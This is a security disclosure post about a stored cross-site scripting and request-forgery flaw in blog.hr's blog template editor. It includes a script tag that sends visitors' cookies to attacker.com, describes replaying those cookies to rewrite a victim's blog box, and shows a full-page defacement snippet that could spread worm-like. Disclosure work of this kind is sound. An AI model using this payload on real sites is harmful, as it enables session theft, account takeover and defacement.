Hacking blog.hr

Few months ago, I have discovered an security flaw in BLOG beta web application on www.blog.hr. Blog.hr has been notified of the flaw around 3 months ago and I have recieved compensation in form of banner advertising for the problem description. Since I haven't recieved an answer to my request to make this public in more than few weeks, I will disclose it now. As much as I can see, they haven't fixed it yet. This advisory is provided under the policy documented at http://www.wiretrip.net/rfp/policy.html.

Here is the explanation.

While editing a blog, user can access HTML code of the template. JavaScript code is not filtered in any way. We insert the following code inside the HEAD html section:
<br /><script>br />var slika=new Image();<br />slika.src='http://attacker.com/csrf.php?cookie='+document.cookie;<br /></script><br />
This is a regular XSS+CSRF attack, where the browser, instead of trying to get an image, sends the cookie data of the guest user. If the user is logged on, the cookies are sent to the attacker server via GET parameter.

Csrf.php script is a modified HTTP client class (http://www.phpclasses.org/browse/package/576.html). The script creates HTTP post request to change BOX-4 section of the victims blog (www.blog.hr/edit/?page=blogeditor&menu=2,3) while inserting recieved cookie data into the request header and setting the valid referer field. When the request is recieved on blog.hr, it seems like it is valid.

BOX-4 can also be used for defacement, with a code like:

<div style="position: absolute; width: 1600px; height: 1600px; z-index: 100; background-color: rgb(0, 255, 0); left: 0px; top: 0px;"><br /><img src="http://www.bloger.hr/img/logo.jpg" /><br /></div>

Also, JavaScript can be inserted inside BOX-4 section, so the code could propagate pretty fast.

Here is the video:



Here are the files:
PHP class
PHP script
JS code for XSS